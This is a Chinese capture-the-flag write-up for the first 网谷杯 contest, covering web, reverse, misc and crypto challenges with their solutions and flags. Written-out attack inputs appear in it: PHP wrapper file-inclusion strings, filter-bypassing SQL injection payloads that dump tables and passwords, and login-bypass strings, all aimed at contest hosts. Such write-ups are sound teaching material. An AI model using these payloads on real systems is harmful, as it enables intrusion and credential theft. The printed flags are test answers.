第一届网谷杯

统计四场的所有题目（共计12题，四场比赛一共上了21题【包括换题】）
随便记记，以免老题复用（已经复用了）

Web

文件包含 1

伪协议
http://120.202.175.143:8011/?c=php://filter/convert.base64-encode/resource=hhb.php

PD9waHANCmlmIChmbm1hdGNoKCIqaGhiLnBocCoiLCRzdmlkMSkpew0KJHN2aWQ9ICdTVklEW25nNTQycGg5OHd5cjk3ZnF2NGMzcXZnOW5qazU0MjRlZWRdJzsNCn1lbHNlew0KZWNobyAndHJ5o6EnOw0KfQ0KPz4NCg==

base64解码

<?php
if (fnmatch("*hhb.php*",$svid1)){
$svid= 'SVID[ng542ph98wyr97fqv4c3qvg9njk5424eed]';
}else{
echo 'try��';
}
?>

文件包含2

乐，共享靶机，被改 flag 了
快结束的时候光速换题（换成了上面那个文件包含）

data伪协议
?c=data://text/plain,<?php highlight_file("index.php");?>

<?php
if (isset($_GET['c']))
if (!fnmatch ("data*",$_GET['c'])){
echo 'GET c<br>$svid';
} else {
$svid='SVID[nwe9felwh309whec5469089ewfq2cpqr]';
include($_GET['c']);
}
else{
echo 'GET c<br>$svid';
exit;
}
?>

xss

Unicode绕过 【xsslab原题吧】
先登录
example：123456
然后输入：

javascript:alert()

点击链接即可

SQL注入

sqlilab原题？
%0a绕过空格过滤

?id=0')uNIOn(sELEct(1),(2),(select(user())));%00
?id=0')union(select(1),2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()));%00
?id=0')union(select(1),2,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name="users"));%00
?id=0%27)union(select(1),2,(select%0agroup_concat(password)%0afrom%0ausers));%00
http://120.202.175.143:8014/index/?id=0%27)uNIOn(sELEct(1),2,(select%0agroup_concat(title)%0afrom%0aarticle));%00

万能密码1

非预期1： admin：admin直接登录
非预期2：curl http://ip:port/svid.php
预期：（自认为）
尝试常规的万能用户密码，形如admin' or 1=1-- ,密码默认都无效，甚至都没有提示
猜测密码可能被hash加密了，就想到了万能字符串ffifdyop
打开burp进行爆破

http://120.202.175.143:8012/?uname=admin%27%20%23&passwd=ffifdyop

万能密码2

非预期：curl http://ip:port/svid.php
预期：

?uname=like' UNION ALL SELECT CONCAT(1,2),NULL-- -&passwd=like

万能密码3

非预期：curl http://ip:port/svid.php
预期：不知道啊

Reverse

re1

不会 re 的都可以做

文件md5 hash为：9083aceef1a0c7ea36183fde040f721e
ida反编译

unsigned __int64 __fastcall ba(__int64 a1, size_t *a2)
{size_t i; // [rsp+18h] [rbp-68h]char v4[20]; // [rsp+2Ch] [rbp-54h] BYREFchar v5[56]; // [rsp+40h] [rbp-40h] BYREFunsigned __int64 v6; // [rsp+78h] [rbp-8h]v6 = __readfsqword(0x28u);strcpy(&v4[6], "djqjnqdwfyl!");strcpy(v4, "flag{");pp(v5, v4, &v4[6]);pp(v5, v5, &unk_2004);*a2 = strlen(v5);for ( i = 0LL; i < *a2; ++i )*(_BYTE *)(a1 + i) = v5[i];return __readfsqword(0x28u) ^ v6;
}

unk_2004的值为}
ai就给分析出flag了

- strcpy(&v4[6], "djqjnqdwfyl!");：将"djqjnqdwfyl!"复制到v4[6]开始的位置。
- strcpy(v4, "flag{");：将"flag{"复制到v4[0]。
- pp(v5, v4, &v4[6]);：假设pp是某种拼接函数（可能是strcat），将v4（"flag{"）和&v4[6]（"djqjnqdwfyl!"）拼接，结果存入v5，即v5 = "flag{djqjnqdwfyl!"。
- pp(v5, v5, &unk_2004);：将v5和某个未知字符串（unk_2004）拼接。

re2

ida反编译看源码

int __cdecl main(int argc, const char **argv, const char **envp)
{v10 = __readfsqword(0x28u);qmemcpy(v8, "Q[VPL{QVAz]PC^Z]R_QCH]VR_]NZMVSZ]ORM_[HV[SN^AJ", 46);v7 = 55;puts("Welcome to the secret decoder!");puts("Can you figure out the key to unlock the secret message?");puts("The message is hidden inside the program...");for ( i = 0; i <= 999999; ++i );for ( j = 0; *((_BYTE *)v8 + j); ++j );putchar(10);printf("Enter the decryption key (in hexadecimal): ");fgets(s, 100, _bss_start);__isoc99_sscanf(s, "%x", &v4);if ( v7 == v4 ){xor_encrypt_decrypt(v8, v7);printf("Decrypted: %s\n", (const char *)v8);}else{puts("Incorrect key. Try again!");}return 0;
}

如果输入的v4等于v7，则解密成功
需要输入16进行 （%x)
55的十六进制是0x37,输入37

$ ./bb
Welcome to the secret decoder!
Can you figure out the key to unlock the secret message?
The message is hidden inside the program...Enter the decryption key (in hexadecimal): 37
Decrypted: flag{LfavMjgtimjehftjaehjymzadmjxezhlaldyiv}

Misc

RSA解密

压缩包里面是一个flag.zip、rsa公钥、密文文件
rsa公钥很短，获取到n可以进行分解
使用RsaCtfTool

$  /opt/RsaCtfTool/RsaCtfTool.py --dumpkey --key rsa_public_key.pem
[!] Using native python functions for math, which is slow. install gmpy2 with: 'python3 -m pip install <module>'.
private argument is not set, the private key will not be displayed, even if recovered.
None
n: 99965623838843374711411183391444104726307314029768628656811347707805304989037
e: 65537

到https://factordb.com/ 分解n得到pq

生成私钥

/opt/RsaCtfTool/RsaCtfTool.py -n 99965623838843374711411183391444104726307314029768628656811347707805304989037 -e 65537 -p 301421686937198008750983790559102741399 -q  331647085034301039007512063728344459163
-----BEGIN RSA PRIVATE KEY-----
MIGqAgEAAiEA3QKJvADgw3sTapG0Bx0KOYVJ+Uy4hfdWtz+fOhShpW0CAwEAAQIg
MzYtWEUTz/gq7ZzJjIRsI62ksoMYL9oST48H90zxqzkCEQDiw7SM9+Zjncud9oGi
q6uXAhEA+YDnu2zTMNUuGGmIUXFnmwIQe7V6hUEkfgnysD1v4Xe4BwIRAJ1GC0zS
sWFjz7WluD8WTCcCEDGBq/10a8U+kL+OpPxp0tM=
-----END RSA PRIVATE KEY-----

使用私钥解密

$ openssl rsautl -decrypt -in venus.en -inkey 1.pem
The command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.
key is 123!@#456

密码是123!@#456
解压压缩包得到flag{78c46c7e7834474f972e3ed44413e27f}

对数据流量进行分析

脚本梭哈

import os
import re
# os.system(r"tshark -r 1.pcapng -T fields -e usbhid.data > usbdata.txt")
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i","0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r","16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1","1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[","30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I","0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R","16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!","1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{","30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
output = []
file = r'usbdata.txt'
with open(file, 'r') as file:contents = file.read().split()# print(contents)for cont in contents:if len(cont) == 16:# 两个字符 '0000100000000000' => ['00', '00', '10', '00', '00', '00', '00', '00']a = re.findall('.{2}', cont)# print(":".join(a))cont = ":".join(a)  # 00:00:10:00:00:00:00:00try:# 去除不合条件的if cont[0] != '0' or (cont[1] != '0' and cont[1] != '2') or cont[3] != '0' or cont[4] != '0' or cont[9] != '0' or cont[10] != '0' or cont[12] != '0' or cont[13] != '0' or cont[15] != '0' or cont[16] != '0' or cont[18] != '0' or cont[19] != '0' or cont[21] != '0' or cont[22] != '0' or cont[6:8] == "00":continueif cont[6:8] in normalKeys.keys():# 没有按 Shift 键if cont[1] != '2':output += normalKeys[cont[6:8]]# print(cont, output)# 按了 Shift 键else:output += shiftKeys[cont[6:8]]else:output += "äă"  # 随便except:pass
print("结果：",output)
flag = ""for i in range(0, len(output)):flag += output[i][0]
print(flag)
flag = re.sub("<CAP>(.*?)<CAP>", lambda matchStr: matchStr.group(1).upper(), flag)
# 循环去除 比如  aaaa<DEL><DEL>这种情况  => aa
while re.findall(r".<DEL>", flag, re.DOTALL):flag = re.sub(r".<DEL>", "", flag, re.DOTALL)
print(flag)

flag需要大写，逆天
flag{A72BD409-B511-472B-A5A0-2F348BC5B9F3}

或者使用ctf-neta梭哈

Crypto

密码的（0解）

现在有一个ctf题目： 小明向网谷杯主办方发送了一条加密信息，并给出了加密代码，遗憾的是，加密代码也被加密了(300分) 密文信息：==DMeOzM6y2p0ZQB3LzpaMUAxOwZ0kTs 加密代码：rgvsm06wIkr06uRuoKYFhipDMTZVpi11dxaycA1vo+FHOPxCbxHdkKDGT5M4dzsONhCYZPfBn7R3dCfpzIxwc5Y8Wp7exB44F69ys0vmqsZ4j+AM2zdWhmg+CctVlXWKFF4phnpgb0UhaV0l1JIAq5+AZ9bwZD6KWXkO9aVTeIbRGemcg1KfSCqCzd1Cjg790YjjWUTb84bM9RQdtlVS932Cg2jfHYwWCQJyB0MOCghQLwYcJryRb+JzJ568c5jwwqTymV4ZJbA1KUIl7KfE3+XjZON4q+nv20tuaXI0FW4Az266/u4a7ORXoKvljJbJFImER/mi0Yb8EuhF3CWLy07kAsYFYT7HHUNT1hGMnmTAVNHmmqXPZoOhnMcdmepJ4NEnXIDE1c0Vif+eZzRKuAxqXOB0Lf9CMQ==

原文